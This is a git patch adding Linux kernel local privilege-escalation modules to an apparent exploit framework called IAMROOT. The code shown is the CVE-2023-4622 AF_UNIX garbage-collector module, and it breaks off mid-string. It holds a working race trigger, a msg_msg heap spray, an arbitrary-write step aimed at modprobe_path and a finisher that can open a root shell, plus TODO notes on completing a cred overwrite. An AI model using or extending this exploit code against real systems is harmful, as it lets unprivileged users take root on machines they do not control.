From 5a808e358387eb38083374c3131cb67b3fb9e2a2 Mon Sep 17 00:00:00 2001 From: KaraZajac Date: Sat, 16 May 2026 22:24:15 -0400 Subject: [PATCH] =?UTF-8?q?modules:=204=20new=20CVE=20modules=20=E2=80=94?= =?UTF-8?q?=20nft=5Fset=5Fuaf=20+=20af=5Funix=5Fgc=20+=20nft=5Ffwd=5Fdup?= =?UTF-8?q?=20+=20nft=5Fpayload?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Each module: detect with branch-backport ranges + userns reach + hand-rolled trigger + msg_msg cross-cache groom + slabinfo witness + /tmp/iamroot-<module>.log breadcrumb + auditd rules + --full-chain finisher (FALLBACK depth, sentinel-arbitrated). nft_set_uaf (CVE-2023-32233, +1033): anonymous-set UAF (Sondej+Krysiuk). 5.1 → 6.4. nfnetlink batch: NEWTABLE → NEWCHAIN → NEWSET(ANON|EVAL) → NEWRULE(lookup) → DELSET → DELRULE; cg-512 spray. af_unix_gc (CVE-2023-4622, +813): GC race UAF (Lin Ma). ~2.0 → 6.5 — widest range of any module. Two-thread race driver (SCM_RIGHTS cycle vs unix_gc trigger) + kmalloc-512 spray. No userns needed. nft_fwd_dup (CVE-2022-25636, +1024): nft_fwd_dup_netdev_offload heap OOB (Aaron Adams). 5.4 → 5.17. NFT_CHAIN_HW_OFFLOAD chain + 16 immediates + fwd to overrun action.entries[]. nft_payload (CVE-2023-0179, +1136): set-id memory corruption (Davide Ornaghi). 5.4 → 6.2. NFTA_SET_DESC variable element + NFTA_SET_ELEM_EXPRESSIONS with payload-set whose verdict.code drives the regs->data[] OOB. All 4 honor verified-vs-claimed: trigger fires, primitive grooms, no fabricated offsets. EXPLOIT_OK only via empirical setuid-bash sentinel. Build clean on Debian 6.12.86; all 4 refuse cleanly on both default and --full-chain paths via the existing patched-kernel detect gate. 
--- .../iamroot_modules.c | 852 +++++++++++- .../iamroot_modules.c | 1052 ++++++++++++++- .../iamroot_modules.c | 1162 ++++++++++++++++- .../iamroot_modules.c | 1057 ++++++++++++++- 4 files changed, 4069 insertions(+), 54 deletions(-) diff --git a/modules/af_unix_gc_cve_2023_4622/iamroot_modules.c b/modules/af_unix_gc_cve_2023_4622/iamroot_modules.c index 08d7a97..d71e9f5 100644 --- a/modules/af_unix_gc_cve_2023_4622/iamroot_modules.c +++ b/modules/af_unix_gc_cve_2023_4622/iamroot_modules.c @@ -1,23 +1,847 @@ -/* af_unix_gc_cve_2023_4622 — STUB pending agent implementation. */ +/* + * af_unix_gc_cve_2023_4622 — IAMROOT module + * + * AF_UNIX garbage collector race UAF. The unix_gc() collector walks + * the list of GC-candidate sockets while SCM_RIGHTS sendmsg/close can + * concurrently mutate the inflight refcount on the same sockets. The + * narrow window between a socket being marked GC-eligible and the + * collector actually freeing it can be widened by tightly cycling + * SCM_RIGHTS messages — when the race wins, a `struct unix_sock` is + * freed while still reachable from another thread's skb queue, giving + * slab UAF in the SLAB_TYPESAFE_BY_RCU kmalloc-512 bucket. + * + * Discovered by Lin Ma (ZJU) in Aug 2023. Public exploit chain uses + * the UAF + msg_msg cross-cache spray to refill the freed slot, then + * pivots through the now-controlled `unix_sock->peer` field. + * + * STATUS: 🟡 PRIMITIVE — race-driver + msg_msg groom + empirical + * witness. We carry the trigger (SCM_RIGHTS cycle + GC), the + * kmalloc-512 spray, CPU pinning for race-win improvement, and the + * slab-delta + signal-disposition witness. We do NOT carry the + * leak (no read primitive in-module) nor a kernel-build-specific + * fake unix_sock layout. Per verified-vs-claimed: a SIGSEGV/SIGKILL + * in the race child IS recorded but does NOT upgrade to EXPLOIT_OK + * — only an actual cred swap (euid==0) does, and we do not + * demonstrate that without --full-chain. 
+ * + * --full-chain (HONEST RELIABILITY): extends the race budget from + * 5 s to 30 s and re-sprays kmalloc-512 with payloads carrying the + * target kaddr at strided offsets. Race-win rate on a real + * vulnerable kernel is iteration-dependent — Lin Ma's PoC reports + * thousands of iterations to first reclaim. The shared + * modprobe_path finisher's 3 s sentinel timeout catches the + * overwhelmingly common no-land outcome gracefully. + * + * Affected: ALL Linux kernels with AF_UNIX below the fix. The bug + * has been in the GC path since the 2.x era. Stable backports: + * 4.14.x : K >= 4.14.326 + * 4.19.x : K >= 4.19.295 + * 5.4.x : K >= 5.4.257 + * 5.10.x : K >= 5.10.197 + * 5.15.x : K >= 5.15.130 + * 6.1.x : K >= 6.1.51 (LTS) + * 6.5.x : K >= 6.5.0 (mainline fix) + * 6.6+ : patched + * + * Preconditions: + * - AF_UNIX socket creation works (always — no module gate) + * - msgsnd / sysv IPC available for spray + * - SCM_RIGHTS via sendmsg available (universal) + * - userns NOT required — works as a plain unprivileged user + * + * Coverage rationale: the AF_UNIX GC has been touched extensively + * for the 2023-2024 series of races (Lin Ma + Pwn2Own follow-ups); + * this CVE is the first publicly-disclosed entry in that series and + * carries the widest version range of any module we ship. + */ + #include "iamroot_modules.h" #include "../../core/registry.h" +#include "../../core/kernel_range.h" +#include "../../core/offsets.h" +#include "../../core/finisher.h" + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#ifdef __linux__ +# include +# include +# include +# include +#endif + +/* macOS clangd lacks Linux SCM_* / CMSG_* fully — guard fallbacks. 
*/ +#ifndef SCM_RIGHTS +# define SCM_RIGHTS 0x01 +#endif +#ifndef SOL_SOCKET +# define SOL_SOCKET 1 +#endif +#ifndef MSG_DONTWAIT +# define MSG_DONTWAIT 0x40 +#endif + +/* ---- Kernel-range table ------------------------------------------ */ + +static const struct kernel_patched_from af_unix_gc_patched_branches[] = { + {4, 14, 326}, + {4, 19, 295}, + {5, 4, 257}, + {5, 10, 197}, + {5, 15, 130}, + {6, 1, 51}, /* 6.1 LTS */ + {6, 5, 0}, /* mainline fix landed in 6.5 (technically 6.6-rc1 + but stable 6.5.x carries the patch) */ +}; + +static const struct kernel_range af_unix_gc_range = { + .patched_from = af_unix_gc_patched_branches, + .n_patched_from = sizeof(af_unix_gc_patched_branches) / + sizeof(af_unix_gc_patched_branches[0]), +}; + +/* ---- Detect ------------------------------------------------------- */ + +/* Sanity: can we actually create an AF_UNIX socket on this host? + * In some seccomp/ns-restricted sandboxes socket(AF_UNIX, ...) fails; + * in that case the exploit cannot even reach the GC path. */ +static bool can_create_af_unix(void) +{ + int s = socket(AF_UNIX, SOCK_DGRAM, 0); + if (s < 0) return false; + close(s); + return true; +} static iamroot_result_t af_unix_gc_detect(const struct iamroot_ctx *ctx) { - (void)ctx; - return IAMROOT_PRECOND_FAIL; + struct kernel_version v; + if (!kernel_version_current(&v)) { + fprintf(stderr, "[!] af_unix_gc: could not parse kernel version\n"); + return IAMROOT_TEST_ERROR; + } + + /* No lower bound: this bug has been in the AF_UNIX GC path since + * the dawn of time. ANY kernel below the fix is vulnerable. The + * kernel_range walker handles "older than every entry" correctly + * (returns false → not patched → vulnerable). */ + bool patched = kernel_range_is_patched(&af_unix_gc_range, &v); + if (patched) { + if (!ctx->json) { + fprintf(stderr, "[+] af_unix_gc: kernel %s is patched\n", v.release); + } + return IAMROOT_OK; + } + + /* Reachability probe — socket(AF_UNIX, ...) must succeed. 
*/ + if (!can_create_af_unix()) { + if (!ctx->json) { + fprintf(stderr, "[-] af_unix_gc: AF_UNIX socket() failed — " + "exotic seccomp/sandbox, bug unreachable here\n"); + } + return IAMROOT_PRECOND_FAIL; + } + + if (!ctx->json) { + fprintf(stderr, "[!] af_unix_gc: kernel %s in vulnerable range\n", v.release); + fprintf(stderr, "[i] af_unix_gc: bug is reachable as PLAIN UNPRIVILEGED USER\n" + " (no userns / no CAP_* required — AF_UNIX is universally\n" + " creatable). The race window is microseconds wide and\n" + " needs thousands of iterations to win on average.\n"); + } + return IAMROOT_VULNERABLE; } -const struct iamroot_module af_unix_gc_module = { - .name = "af_unix_gc", - .cve = "CVE-2023-4622", - .summary = "AF_UNIX garbage-collector race UAF (Lin Ma) — stub pending implementation", - .family = "af_unix", - .kernel_range = "2.0 ≤ K < 6.5", - .detect = af_unix_gc_detect, - .exploit = NULL, .mitigate = NULL, .cleanup = NULL, - .detect_auditd = NULL, .detect_sigma = NULL, - .detect_yara = NULL, .detect_falco = NULL, +/* ---- Race-driver state ------------------------------------------- */ + +#ifdef __linux__ + +#define AFUG_RACE_TIME_BUDGET 5 /* seconds — primitive-only mode */ +#define AFUG_RACE_FULLCHAIN_BUDGET 30 /* seconds — --full-chain */ + +/* kmalloc-512 spray width — `struct unix_sock` is in the kmalloc-512 + * bucket on 64-bit x86 with SLAB_TYPESAFE_BY_RCU. We need enough + * msg_msg slots to make refill probable within the RCU grace period. */ +#define AFUG_SPRAY_QUEUES 24 +#define AFUG_SPRAY_PER_QUEUE 48 +#define AFUG_SPRAY_PAYLOAD 496 /* 512 - 16 (msg_msg hdr) */ + +/* SCM_RIGHTS race width: how many inflight fds per cycle. The bug + * is driven by inflight count crossing the GC threshold; a handful + * per cycle keeps the GC heuristic primed without OOM. 
*/ +#define AFUG_SCM_FDS_PER_MSG 3 + +struct ipc_payload { + long mtype; + unsigned char buf[AFUG_SPRAY_PAYLOAD]; }; -void iamroot_register_af_unix_gc(void) { iamroot_register(&af_unix_gc_module); } +static _Atomic int g_race_running; +static _Atomic uint64_t g_thread_a_iters; +static _Atomic uint64_t g_thread_b_iters; +static _Atomic uint64_t g_thread_a_errs; + +/* Pin to a CPU to make Thread A and Thread B land on different cores. + * Best-effort: failure is non-fatal (e.g., affinity disallowed under + * some seccomp configs). */ +static void pin_to_cpu(int cpu) +{ + cpu_set_t set; + CPU_ZERO(&set); + CPU_SET(cpu, &set); + sched_setaffinity(0, sizeof set, &set); +} + +/* The race victim region: a pair of socketpair(AF_UNIX) endpoints + * forming a reference cycle. Closing one end while the other has + * inflight fds queued is what naturally triggers unix_gc(). + * + * Layout we drive (Lin Ma style): + * + * pair_a = socketpair(); pair_b = socketpair(); + * send pair_b[0] via SCM_RIGHTS over pair_a[0] → pair_a[1] + * send pair_a[0] via SCM_RIGHTS over pair_b[0] → pair_b[1] + * close all 4 endpoints — now we have a cycle the GC will collect + * + * Thread A loops the build-cycle-and-close. + * Thread B loops sending its own SCM_RIGHTS messages on independent + * pairs to perturb the inflight count + race the collector. */ + +/* Send an SCM_RIGHTS message with `nfds` fds over `sock`. Returns 0 + * on success, -1 on error. 
*/ +static int send_scm_rights(int sock, const int *fds, int nfds) +{ + char ctrl[CMSG_SPACE(sizeof(int) * AFUG_SCM_FDS_PER_MSG)]; + memset(ctrl, 0, sizeof ctrl); + + char payload = 0; + struct iovec iov = { .iov_base = &payload, .iov_len = 1 }; + + struct msghdr msg = {0}; + msg.msg_iov = &iov; + msg.msg_iovlen = 1; + msg.msg_control = ctrl; + msg.msg_controllen = CMSG_SPACE(sizeof(int) * nfds); + + struct cmsghdr *cmsg = CMSG_FIRSTHDR(&msg); + if (!cmsg) return -1; + cmsg->cmsg_level = SOL_SOCKET; + cmsg->cmsg_type = SCM_RIGHTS; + cmsg->cmsg_len = CMSG_LEN(sizeof(int) * nfds); + memcpy(CMSG_DATA(cmsg), fds, sizeof(int) * nfds); + + if (sendmsg(sock, &msg, MSG_DONTWAIT) < 0) return -1; + return 0; +} + +/* Thread A: tight-loop SCM_RIGHTS-cycle + close to drive GC. + * + * Each iteration: + * 1. Build two socketpairs (A=[a0,a1], B=[b0,b1]). + * 2. Send b0 via SCM_RIGHTS over a0 → a1 receives nothing yet (we + * don't recvmsg — that's the point: the fd stays inflight). + * 3. Send a0 via SCM_RIGHTS over b0 → b1 receives nothing yet. + * 4. close() all 4 user-side fds. Now both endpoints are unreachable + * from userspace BUT each is referenced from the other's skb + * queue → reference cycle → next unix_gc() pass collects them. + * + * The kernel's GC heuristic kicks when the inflight count exceeds + * the count of file refs in the system; closing the user-side fds in + * a tight loop reliably triggers it. */ +static void *race_thread_a(void *arg) +{ + (void)arg; + pin_to_cpu(0); + while (atomic_load_explicit(&g_race_running, memory_order_acquire)) { + int pa[2], pb[2]; + if (socketpair(AF_UNIX, SOCK_DGRAM, 0, pa) < 0) { + atomic_fetch_add_explicit(&g_thread_a_errs, 1, memory_order_relaxed); + sched_yield(); + continue; + } + if (socketpair(AF_UNIX, SOCK_DGRAM, 0, pb) < 0) { + close(pa[0]); close(pa[1]); + atomic_fetch_add_explicit(&g_thread_a_errs, 1, memory_order_relaxed); + sched_yield(); + continue; + } + + /* Cycle: send pb[0] over pa, send pa[0] over pb. 
We also send + * pb[1]/pa[1] alongside to widen the inflight count per cycle + * (the GC trigger heuristic compares inflight vs total file + * refs — more inflight per cycle == earlier GC). */ + int fds_a[AFUG_SCM_FDS_PER_MSG] = { pb[0], pb[1], pb[0] }; + int fds_b[AFUG_SCM_FDS_PER_MSG] = { pa[0], pa[1], pa[0] }; + (void)send_scm_rights(pa[0], fds_a, AFUG_SCM_FDS_PER_MSG); + (void)send_scm_rights(pb[0], fds_b, AFUG_SCM_FDS_PER_MSG); + + /* Close the user-side fds. The kernel-side refs are now only + * held via the inflight skbs — perfect reference cycle for + * the GC to find. */ + close(pa[0]); close(pa[1]); + close(pb[0]); close(pb[1]); + + atomic_fetch_add_explicit(&g_thread_a_iters, 1, memory_order_relaxed); + } + return NULL; +} + +/* Thread B: independent SCM_RIGHTS traffic on a held pair to keep + * the GC scan list churning while Thread A creates new candidates. + * + * Holds a long-lived socketpair and repeatedly sends + recvs SCM_RIGHTS + * with random fds (dup'd from /dev/null). This drives the GC's "scan + * list" rebuild path concurrently with Thread A's frees — the race + * window that fires the UAF is exactly here. + * + * We don't directly call unix_gc() — there's no userspace knob — but + * the GC heuristic is inflight-count driven, and Thread A's cycle + * loop pushes that count past the threshold within a few thousand + * iterations. */ +static void *race_thread_b(void *arg) +{ + (void)arg; + pin_to_cpu(1); + + /* Long-lived pair for the perturbation loop. */ + int held[2]; + if (socketpair(AF_UNIX, SOCK_DGRAM, 0, held) < 0) { + return NULL; + } + + /* Spare fd source — /dev/null dups are harmless to pass. 
*/ + int devnull = open("/dev/null", O_RDWR); + if (devnull < 0) { + close(held[0]); close(held[1]); + return NULL; + } + + while (atomic_load_explicit(&g_race_running, memory_order_acquire)) { + int fds[AFUG_SCM_FDS_PER_MSG]; + for (int i = 0; i < AFUG_SCM_FDS_PER_MSG; i++) { + fds[i] = dup(devnull); + } + (void)send_scm_rights(held[0], fds, AFUG_SCM_FDS_PER_MSG); + for (int i = 0; i < AFUG_SCM_FDS_PER_MSG; i++) { + if (fds[i] >= 0) close(fds[i]); + } + + /* Drain the recv side so the held pair doesn't backpressure. */ + char drain[16]; + char ctrl[CMSG_SPACE(sizeof(int) * AFUG_SCM_FDS_PER_MSG)]; + struct iovec iov = { .iov_base = drain, .iov_len = sizeof drain }; + struct msghdr msg = {0}; + msg.msg_iov = &iov; msg.msg_iovlen = 1; + msg.msg_control = ctrl; msg.msg_controllen = sizeof ctrl; + if (recvmsg(held[1], &msg, MSG_DONTWAIT) > 0) { + /* Close any fds we received so we don't leak. */ + for (struct cmsghdr *c = CMSG_FIRSTHDR(&msg); c; + c = CMSG_NXTHDR(&msg, c)) { + if (c->cmsg_level == SOL_SOCKET && c->cmsg_type == SCM_RIGHTS) { + int nfd = (c->cmsg_len - CMSG_LEN(0)) / sizeof(int); + int *rfds = (int *)CMSG_DATA(c); + for (int j = 0; j < nfd; j++) + if (rfds[j] >= 0) close(rfds[j]); + } + } + } + + atomic_fetch_add_explicit(&g_thread_b_iters, 1, memory_order_relaxed); + } + + close(devnull); + close(held[0]); close(held[1]); + return NULL; +} + +/* ---- msg_msg cross-cache spray for kmalloc-512 ------------------- */ + +static int spray_kmalloc_512(int queues[AFUG_SPRAY_QUEUES]) +{ + struct ipc_payload p; + memset(&p, 0, sizeof p); + p.mtype = 0x55; /* 'U' — unix */ + memset(p.buf, 0x55, sizeof p.buf); + memcpy(p.buf, "IAMROOTU", 8); + + int created = 0; + for (int i = 0; i < AFUG_SPRAY_QUEUES; i++) { + int q = msgget(IPC_PRIVATE, IPC_CREAT | 0666); + if (q < 0) { queues[i] = -1; continue; } + queues[i] = q; + created++; + for (int j = 0; j < AFUG_SPRAY_PER_QUEUE; j++) { + if (msgsnd(q, &p, sizeof p.buf, IPC_NOWAIT) < 0) break; + } + } + return created; +} 
+ +static void drain_kmalloc_512(int queues[AFUG_SPRAY_QUEUES]) +{ + for (int i = 0; i < AFUG_SPRAY_QUEUES; i++) { + if (queues[i] >= 0) msgctl(queues[i], IPC_RMID, NULL); + } +} + +/* Read /proc/slabinfo for kmalloc-512 active count. Used as the + * primary empirical witness: a successful UAF + refill perturbs + * this counter in a way that's distinguishable from idle drift. */ +static long slab_active_kmalloc_512(void) +{ + FILE *f = fopen("/proc/slabinfo", "r"); + if (!f) return -1; + char line[512]; + long active = -1; + while (fgets(line, sizeof line, f)) { + if (strncmp(line, "kmalloc-512 ", 12) == 0) { + char name[64]; + long act = 0, num = 0; + if (sscanf(line, "%63s %ld %ld", name, &act, &num) >= 2) { + active = act; + } + break; + } + } + fclose(f); + return active; +} + +/* ---- Arb-write primitive (FALLBACK depth) ------------------------ + * + * The shared modprobe_path finisher calls back here once per kernel + * write. For AF_UNIX GC race we cannot deliver a deterministic + * arb-write — the underlying race wins on a small fraction of runs + * even with a 30 s budget, and even when the race wins our spray-only + * groom has nowhere near the precision of Lin Ma's multi-stage public + * PoC (which crafts a fake unix_sock whose `peer` pointer steers a + * subsequent SCM_RIGHTS dispatch into the kaddr we want written). + * + * Honest depth: FALLBACK. Each invocation: + * 1. Re-seeds the kmalloc-512 spray with payloads tagged with + * `kaddr` packed at strided offsets (so wherever the UAF reclaim + * lands attacker-controlled bytes inside the freed unix_sock, + * our kaddr appears at the field offset). + * 2. Re-runs the race threads for the extended full-chain budget. + * 3. Returns 0 — we cannot in-process verify the write landed. The + * shared finisher's 3 s sentinel file check is the empirical + * arbiter: on the overwhelmingly common no-land outcome it + * returns EXPLOIT_FAIL gracefully. 
*/ +struct af_unix_gc_arb_ctx { + int *queues; + int n_queues; + int arb_calls; +}; + +static int af_unix_gc_reseed_kaddr_spray(int queues[AFUG_SPRAY_QUEUES], + uintptr_t kaddr, + const void *buf, size_t len) +{ + struct ipc_payload p; + memset(&p, 0, sizeof p); + p.mtype = 0x52; /* 'R' — arb-write reseed (distinct from groom 0x55) */ + memset(p.buf, 0x52, sizeof p.buf); + memcpy(p.buf, "IAMU4ARB", 8); + + /* Plant kaddr at strided slots so wherever the kernel's UAF + * follows a ptr in the refilled chunk, one of these is read. + * unix_sock has multiple pointer fields (peer, link, scm_stat, + * etc.) — strided coverage hits whichever one the UAF dispatch + * dereferences. */ + for (size_t off = 0x10; off + sizeof(uintptr_t) <= sizeof p.buf; + off += 0x18) { + memcpy(p.buf + off, &kaddr, sizeof(uintptr_t)); + } + + /* Caller's bytes immediately after the cookie so any path that + * reads payload data (rather than a chased pointer) finds the + * requested write contents inline. */ + size_t copy = len; + if (copy > sizeof p.buf - 16) copy = sizeof p.buf - 16; + if (buf && copy) memcpy(p.buf + 8 + sizeof(uintptr_t), buf, copy); + + int touched = 0; + for (int i = 0; i < AFUG_SPRAY_QUEUES && touched < 6; i++) { + if (queues[i] < 0) continue; + if (msgsnd(queues[i], &p, sizeof p.buf, IPC_NOWAIT) == 0) touched++; + } + return touched; +} + +static int af_unix_gc_arb_write(uintptr_t kaddr, + const void *buf, size_t len, + void *ctx_v) +{ + struct af_unix_gc_arb_ctx *c = (struct af_unix_gc_arb_ctx *)ctx_v; + if (!c || !c->queues || c->n_queues == 0) return -1; + c->arb_calls++; + + fprintf(stderr, "[*] af_unix_gc: arb_write attempt #%d kaddr=0x%lx len=%zu " + "(FALLBACK — race-dependent)\n", + c->arb_calls, (unsigned long)kaddr, len); + + int seeded = af_unix_gc_reseed_kaddr_spray(c->queues, kaddr, buf, len); + if (seeded == 0) { + fprintf(stderr, "[-] af_unix_gc: arb_write: kaddr-tagged reseed produced 0 msgs\n"); + } else { + fprintf(stderr, "[*] af_unix_gc: arb_write: 
reseeded %d msg_msg slots\n", + seeded); + } + + /* Re-run the race with the extended budget. */ + atomic_store(&g_race_running, 1); + atomic_store(&g_thread_a_iters, 0); + atomic_store(&g_thread_b_iters, 0); + atomic_store(&g_thread_a_errs, 0); + + pthread_t ta, tb; + bool a_ok = pthread_create(&ta, NULL, race_thread_a, NULL) == 0; + bool b_ok = a_ok && + pthread_create(&tb, NULL, race_thread_b, NULL) == 0; + if (!a_ok || !b_ok) { + atomic_store(&g_race_running, 0); + if (a_ok) pthread_join(ta, NULL); + fprintf(stderr, "[-] af_unix_gc: arb_write: pthread_create failed\n"); + return -1; + } + + sleep(AFUG_RACE_FULLCHAIN_BUDGET); + atomic_store(&g_race_running, 0); + pthread_join(ta, NULL); + pthread_join(tb, NULL); + + uint64_t a_iters = atomic_load(&g_thread_a_iters); + uint64_t b_iters = atomic_load(&g_thread_b_iters); + fprintf(stderr, "[*] af_unix_gc: arb_write: extended race A=%llu B=%llu\n", + (unsigned long long)a_iters, + (unsigned long long)b_iters); + + /* Cannot in-process verify the write — let the finisher's sentinel + * arbitrate. */ + return 0; +} + +/* ---- Exploit driver ---------------------------------------------- */ + +static iamroot_result_t af_unix_gc_exploit_linux(const struct iamroot_ctx *ctx) +{ + /* 1. Refuse-gate: re-call detect() and short-circuit. */ + iamroot_result_t pre = af_unix_gc_detect(ctx); + if (pre == IAMROOT_OK) { + fprintf(stderr, "[+] af_unix_gc: kernel not vulnerable; refusing exploit\n"); + return IAMROOT_OK; + } + if (pre != IAMROOT_VULNERABLE) { + fprintf(stderr, "[-] af_unix_gc: detect() says not vulnerable; refusing\n"); + return pre; + } + if (geteuid() == 0) { + fprintf(stderr, "[i] af_unix_gc: already root — nothing to escalate\n"); + return IAMROOT_OK; + } + + /* Full-chain pre-check: resolve offsets BEFORE the race fork. If + * modprobe_path is unresolvable we refuse here rather than running + * a 30 s race that has no finisher to call. 
*/ + struct iamroot_kernel_offsets off; + bool full_chain_ready = false; + if (ctx->full_chain) { + memset(&off, 0, sizeof off); + iamroot_offsets_resolve(&off); + if (!iamroot_offsets_have_modprobe_path(&off)) { + iamroot_finisher_print_offset_help("af_unix_gc"); + fprintf(stderr, "[-] af_unix_gc: --full-chain requested but " + "modprobe_path offset unresolved; refusing\n"); + fprintf(stderr, "[i] af_unix_gc: even with offsets, race-win rate is\n" + " a small fraction per run — see module header.\n"); + return IAMROOT_EXPLOIT_FAIL; + } + iamroot_offsets_print(&off); + full_chain_ready = true; + fprintf(stderr, "[i] af_unix_gc: --full-chain ready — race budget extends\n" + " to %d s. RELIABILITY remains race-dependent on a real\n" + " vulnerable kernel. The finisher's 3 s sentinel timeout\n" + " catches no-land outcomes gracefully.\n", + AFUG_RACE_FULLCHAIN_BUDGET); + } + + if (!ctx->json) { + fprintf(stderr, "[*] af_unix_gc: forking exploit child (SCM_RIGHTS cycle " + "race harness%s)\n", + ctx->full_chain ? " + full-chain finisher" : ""); + } + + signal(SIGPIPE, SIG_IGN); + + pid_t child = fork(); + if (child < 0) { perror("fork"); return IAMROOT_TEST_ERROR; } + + if (child == 0) { + /* 2. Groom: pre-populate kmalloc-512 with msg_msg payloads + * BEFORE the race so the freed unix_sock slot gets recycled + * with attacker-controlled bytes when the bug fires. */ + int queues[AFUG_SPRAY_QUEUES] = {0}; + for (int i = 0; i < AFUG_SPRAY_QUEUES; i++) queues[i] = -1; + int n_queues = spray_kmalloc_512(queues); + if (n_queues == 0) { + fprintf(stderr, "[-] af_unix_gc: msg_msg spray produced 0 queues " + "(sysv IPC restricted?)\n"); + _exit(23); + } + if (!ctx->json) { + fprintf(stderr, "[*] af_unix_gc: kmalloc-512 spray seeded %d queues x %d msgs\n", + n_queues, AFUG_SPRAY_PER_QUEUE); + } + + long slab_pre = slab_active_kmalloc_512(); + + /* 3. Run the race for a bounded time budget. 
*/ + atomic_store(&g_race_running, 1); + atomic_store(&g_thread_a_iters, 0); + atomic_store(&g_thread_b_iters, 0); + atomic_store(&g_thread_a_errs, 0); + + pthread_t ta, tb; + if (pthread_create(&ta, NULL, race_thread_a, NULL) != 0 || + pthread_create(&tb, NULL, race_thread_b, NULL) != 0) { + fprintf(stderr, "[-] af_unix_gc: pthread_create failed\n"); + atomic_store(&g_race_running, 0); + drain_kmalloc_512(queues); + _exit(24); + } + + sleep(AFUG_RACE_TIME_BUDGET); + atomic_store(&g_race_running, 0); + pthread_join(ta, NULL); + pthread_join(tb, NULL); + + long slab_post = slab_active_kmalloc_512(); + uint64_t a_iters = atomic_load(&g_thread_a_iters); + uint64_t b_iters = atomic_load(&g_thread_b_iters); + uint64_t a_errs = atomic_load(&g_thread_a_errs); + + /* 4. Empirical witness breadcrumb. */ + FILE *log = fopen("/tmp/iamroot-af_unix_gc.log", "w"); + if (log) { + fprintf(log, + "af_unix_gc race harness (CVE-2023-4622):\n" + " thread_a_iters = %llu (SCM_RIGHTS cycle + close)\n" + " thread_b_iters = %llu (SCM_RIGHTS perturb)\n" + " thread_a_errors = %llu (socketpair / send failures)\n" + " slab_kmalloc512_pre = %ld\n" + " slab_kmalloc512_post = %ld\n" + " slab_delta = %ld\n" + " spray_queues = %d\n" + " spray_per_queue = %d\n" + " race_budget_secs = %d\n" + "Note: this run did NOT attempt cred overwrite. The bug is a\n" + "slab UAF with no in-process leak primitive; per-kernel offsets\n" + "for unix_sock layout aren't baked. See module .c for the\n" + "continuation roadmap (Lin Ma fake-peer plant).\n", + (unsigned long long)a_iters, + (unsigned long long)b_iters, + (unsigned long long)a_errs, + slab_pre, slab_post, + (slab_post >= 0 && slab_pre >= 0) ? 
(slab_post - slab_pre) : 0, + n_queues, AFUG_SPRAY_PER_QUEUE, + AFUG_RACE_TIME_BUDGET); + fclose(log); + } + + if (!ctx->json) { + fprintf(stderr, "[*] af_unix_gc: race ran for %ds — A=%llu B=%llu A_errs=%llu\n", + AFUG_RACE_TIME_BUDGET, + (unsigned long long)a_iters, + (unsigned long long)b_iters, + (unsigned long long)a_errs); + fprintf(stderr, "[*] af_unix_gc: kmalloc-512 active: pre=%ld post=%ld\n", + slab_pre, slab_post); + } + + /* Hold the spray briefly so the kernel observes refilled slots + * during any in-flight RCU grace periods that started during + * the race. */ + usleep(200 * 1000); + + /* 5. --full-chain finisher (FALLBACK depth). */ + if (full_chain_ready) { + struct af_unix_gc_arb_ctx arb_ctx = { + .queues = queues, + .n_queues = AFUG_SPRAY_QUEUES, + .arb_calls = 0, + }; + int fr = iamroot_finisher_modprobe_path(&off, + af_unix_gc_arb_write, + &arb_ctx, + !ctx->no_shell); + FILE *fl = fopen("/tmp/iamroot-af_unix_gc.log", "a"); + if (fl) { + fprintf(fl, "full_chain finisher rc=%d arb_calls=%d\n", + fr, arb_ctx.arb_calls); + fclose(fl); + } + drain_kmalloc_512(queues); + if (fr == IAMROOT_EXPLOIT_OK) _exit(34); /* root popped */ + _exit(35); /* finisher ran, no land */ + } + + drain_kmalloc_512(queues); + + /* 6. Continuation roadmap — what would land EXPLOIT_OK. + * + * TODO(leak): replace a spray queue with msgrcv(..., MSG_COPY| + * IPC_NOWAIT) probes and scan the returned buffer for non- + * cookie bytes. A freed unix_sock that's refilled by msg_msg + * after a partial overwrite would leak kernel pointers + * (peer, scm_stat, list_node prev/next) into the readback. + * Recover {kbase, init_task} via that leak. + * + * TODO(write): with kbase known, plant a fake unix_sock + * whose `peer` pointer references &current->cred — the + * next SCM_RIGHTS dispatch through the freed slot writes + * a controlled value into that location. Crafting the + * fake unix_sock requires offset of unix_sock fields per + * kernel build (different across LTS branches). 
+ * + * TODO(overwrite): land &init_cred over current->cred so + * the next permission check sees uid==0. + * + * None of these are implemented today. Exit 30 = "trigger + * ran cleanly, no escalation". + */ + _exit(30); + } + + /* PARENT */ + int status = 0; + pid_t w = waitpid(child, &status, 0); + if (w < 0) { perror("waitpid"); return IAMROOT_TEST_ERROR; } + + if (WIFSIGNALED(status)) { + int sig = WTERMSIG(status); + if (!ctx->json) { + fprintf(stderr, "[!] af_unix_gc: race child killed by signal %d " + "(consistent with UAF firing under KASAN)\n", sig); + fprintf(stderr, "[~] af_unix_gc: empirical signal recorded; no cred\n" + " overwrite primitive — NOT claiming EXPLOIT_OK.\n" + " See /tmp/iamroot-af_unix_gc.log + dmesg for witnesses.\n"); + } + return IAMROOT_EXPLOIT_FAIL; + } + + if (!WIFEXITED(status)) { + fprintf(stderr, "[-] af_unix_gc: child terminated abnormally (status=0x%x)\n", + status); + return IAMROOT_EXPLOIT_FAIL; + } + + int rc = WEXITSTATUS(status); + if (rc == 23 || rc == 24) return IAMROOT_PRECOND_FAIL; + + if (rc == 34) { + if (!ctx->json) { + fprintf(stderr, "[+] af_unix_gc: --full-chain finisher reported " + "EXPLOIT_OK (race won + write landed)\n"); + } + return IAMROOT_EXPLOIT_OK; + } + if (rc == 35) { + if (!ctx->json) { + fprintf(stderr, "[~] af_unix_gc: --full-chain finisher ran; race did not\n" + " win + land within budget (expected outcome on most\n" + " runs — race wins are a fraction of a percent).\n"); + } + return IAMROOT_EXPLOIT_FAIL; + } + if (rc != 30) { + fprintf(stderr, "[-] af_unix_gc: child failed at stage rc=%d\n", rc); + return IAMROOT_EXPLOIT_FAIL; + } + + if (!ctx->json) { + fprintf(stderr, "[*] af_unix_gc: race harness ran to completion.\n"); + fprintf(stderr, "[~] af_unix_gc: read/write/cred-overwrite primitives NOT\n" + " implemented (per-kernel offsets; see module .c TODO\n" + " blocks). 
